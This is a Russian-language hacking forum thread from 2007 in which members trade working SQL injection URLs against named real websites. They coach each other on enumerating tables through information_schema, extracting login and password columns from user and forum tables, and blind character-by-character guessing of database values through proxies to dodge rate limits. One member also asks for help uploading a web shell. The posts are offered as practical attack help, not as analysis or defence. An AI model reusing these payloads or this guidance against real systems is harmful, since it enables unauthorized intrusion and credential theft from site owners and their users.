Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Heavy Metal

    Heavy Metal Member

    Joined:
    16 Sep 2007
    Messages:
    19
    Likes Received:
    27
    Reputations:
    7
    of69, нужно в запросе указать бд:

    Code:
    http://www.att.su//kengur_kat/index.php?cat=111111+union+select+1,2,3,4,5+from+gallery2.g2_User/*
     
    1 person likes this.
  2. delay(0)

    delay(0) Member

    Joined:
    22 Nov 2006
    Messages:
    90
    Likes Received:
    41
    Reputations:
    6
    2 of69
    Code:
    Ктонибудь, подскажите плиз в чём проблема, и как её решить?)
    Смотришь database(), если запрос возвращает к примеру db1, то меняешь запрос на ...+from+db1.g2_User...
    Если не прокатывает, то смотришь в какой базе эта таблица лежит.
    ...select+table_schema+from+information_schema.columns+where+table_name=g2_User...
    Не забудь закодировать имя таблицы char`ои или hex'ом. Ну и соответственно полученной базе составляешь запрос.

    2 Calcutta
    Никакого посимвольного подбора. Юзай limit. ^^
    Code:
    http://la2.acrossworld.ru/index.php?act=18&rlvl=7&r_rec_id=-1+union+select+1,2,table_name,4,5,6,7,8+from+information_schema.tables+limit+0,1/*
    Поочередно меняешь limit+0,1/*, limit+1,1/*, 2,1 и т.д. Все таблички как на ладошке.
     
    #162 delay(0), 18 Sep 2007
    Last edited: 18 Sep 2007
  3. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    Лол, под пароли не создается спец. таблица :D

    Ищи на форуме списки распространенных названий пользовательских таблиц.

    account
    accounts
    game_accounts
    sup_auth
    la2_auth

    и т.д.
     
  4. Calcutta

    Calcutta Elder - Старейшина

    Joined:
    6 Aug 2007
    Messages:
    343
    Likes Received:
    243
    Reputations:
    36
    распространенные пробовал уже, практически все те что есть на форуме.
    значит у меня должен будет быть запрос примерно такой:
    http://la2.acrossworld.ru/index.php?act=18&rlvl=7&r_rec_id=-1+union+select+1,2,concat_ws(0x3a,[название таблиц с паролями],[id аккаунта]),4,5,6,7,8+from+[таблица с аккаунтами (к примеру, accounts)]/*
     
  5. 1d37r

    1d37r Banned

    Joined:
    24 Aug 2007
    Messages:
    38
    Likes Received:
    13
    Reputations:
    -34
    Подскажите что это?
     
  6. groundhog

    groundhog Elder - Старейшина

    Joined:
    12 May 2007
    Messages:
    1,159
    Likes Received:
    425
    Reputations:
    180
    Ну если дословно... Это неуспешное выполнение какой-то функции. Причина - попытка выборки из несуществующей таблицы "jos_session" в базе "db0742011".
     
  7. 1d37r

    1d37r Banned

    Joined:
    24 Aug 2007
    Messages:
    38
    Likes Received:
    13
    Reputations:
    -34
    а как это можно исправить и как хакер может этим воспользоваться?
     
  8. Calcutta

    Calcutta Elder - Старейшина

    Joined:
    6 Aug 2007
    Messages:
    343
    Likes Received:
    243
    Reputations:
    36
    ссылку, пожалуйста, выложи =) а там мож чем и сможем помочь.
    //обложился распечатками статей.. всё-таки тяжело одному сидеть разбираться -))
    //может кто подсказать по моей инъекции, а то мозг разрывает уже -)) второй день пытаюсь расковырять где там пароли лежат. а если кто доработает, то на плюсики не поскуплюсь ;)
     
  9. 1d37r

    1d37r Banned

    Joined:
    24 Aug 2007
    Messages:
    38
    Likes Received:
    13
    Reputations:
    -34
    http://www.battle.rapx.net.ru/index.php
     
  10. groundhog

    groundhog Elder - Старейшина

    Joined:
    12 May 2007
    Messages:
    1,159
    Likes Received:
    425
    Reputations:
    180
    1d37r, ну то, что не работает хакер вряд ли использует... Кода я не видел, поэтому не знаю как передаётся этот хеш скриптам, и что фильтруется... Если параметр, в котором передаётся хеш уязвим к SQL-Injection, то можно провести атаку. Настчёт исправления опять же... Ты смотрел - эта таблица, из которой идёт выборка есть?
     
  11. 1d37r

    1d37r Banned

    Joined:
    24 Aug 2007
    Messages:
    38
    Likes Received:
    13
    Reputations:
    -34
    если честно я не знаю просто знакомый попросил посмотреть я посмотрел нихера не понял... вот решил у вас поинтересоваться)))) вообщем так на первый взгляд ничего опасного нет??
     
  12. MegaBits

    MegaBits Elder - Старейшина

    Joined:
    30 Aug 2006
    Messages:
    151
    Likes Received:
    24
    Reputations:
    10
    Помогите залить шелл если это возможно.
    Вот нашел давно такие скуль иньекции
    Сайты расположены на одном хостинге пароль к ftp расшифровать несмог. К некоторым владельцам сайтов есть пароль, но к незнаю где его вводить??? Еще там есть форум, может кто-то сможет доработать скуль чтоб вытащить хеш админа форума.
     
  13. Heavy Metal

    Heavy Metal Member

    Joined:
    16 Sep 2007
    Messages:
    19
    Likes Received:
    27
    Reputations:
    7
    MegaBits, форумные
    Code:
    http://www.berdyansk.net/pointer/links.php?part_id=-18+union+select+1,2,3,pass,login,6+from+forum.users/*
     
    1 person likes this.
  14. Calcutta

    Calcutta Elder - Старейшина

    Joined:
    6 Aug 2007
    Messages:
    343
    Likes Received:
    243
    Reputations:
    36
    Проблема решена, с помощью наставления на путь истинный более опытными sql-injecter'ами. :)
    Всем, принявшим участие, выражаю огромную благодарность!
     
  15. Kaimi

    Kaimi Well-Known Member

    Joined:
    23 Aug 2007
    Messages:
    1,732
    Likes Received:
    811
    Reputations:
    231
    Помогите раскрутить скулю itsoft.ru/search/?search_query=1&in_cat=1'
     
    _________________________
    1 person likes this.
  16. phol1eadeux

    phol1eadeux Elder - Старейшина

    Joined:
    7 Aug 2007
    Messages:
    108
    Likes Received:
    48
    Reputations:
    -1
    Пользователь урезан в правах. Делать нечего
     
  17. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    http://itsoft.ru/search/?search_query=1&in_cat=hek%'+union+select +version()/*
    version() = 4.1.14
    user() = itcms_test@localhost
    database() = itcms_test

    http://itcms3.itsoft.ru/itcms/
    ^^
     
    _________________________
    #177 +toxa+, 20 Sep 2007
    Last edited: 20 Sep 2007
    5 people like this.
  18. SUBJECT617

    SUBJECT617 Elder - Старейшина

    Joined:
    6 Aug 2007
    Messages:
    73
    Likes Received:
    34
    Reputations:
    -2
    http://www.stalker-portal.ru/polls.php?id=1'
    (Моя первая найденная скуля... Сразу говорю, вопросу ламерские, но для того и эта тема)

    НУ так вот, число столбцов 6..

    Однако по Полному ФАКу в разделе статьи в пункте "2.1.2 Определение выводимых столбцов" у меня стопор... Никакие "циферки" не высвечиваются :(

    http://www.stalker-portal.ru/polls.php?id=1' UNION SELECT 1,2,3,4,5,6 --/* -Вот собственно и оно:(

    В общем наставьте меня на путь истинный... Хочется узнать, можно отсюда что выжать или нет(
     
    #178 SUBJECT617, 26 Sep 2007
    Last edited: 26 Sep 2007
    3 people like this.
  19. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    http://www.stalker-portal.ru/polls.php?id=1'%20or%20ascii(substring(user(),1,1))>0/*
    http://www.stalker-portal.ru/polls.php?id=1'%20or%20ascii(substring(user(),1,1))<0/*

    только там некая защита.. врубается на кол-во запросов в минуту, поэтому через проксики надо брутить все ))
     
    1 person likes this.
  20. SUBJECT617

    SUBJECT617 Elder - Старейшина

    Joined:
    6 Aug 2007
    Messages:
    73
    Likes Received:
    34
    Reputations:
    -2
    Хмм, а эта защита случаем не на 200 секунд блочит? Я пытался просканить но меня забанили изза 'Hammering' на 200 секунд.
    Такс, а где можно почитать про or ascii...? В факе этого нет...

    Спс буду брутить) А как перейти на второй символ?

    sm.. С символами разобрался, покачто не забанили... А ты сколько брутил то?) Как определить сколько символов? Точнее когда закончатся символы?

    А как ты сделал так что он тебе показывает голосование при 1? ТАм на 1 и на 0 ничего нет в id


    И еще... Пасс сгенеренный сто пороцентов... Как же я с регистром разберусь??
     
    #180 SUBJECT617, 27 Sep 2007
    Last edited: 27 Sep 2007
Thread Status:
Not open for further replies.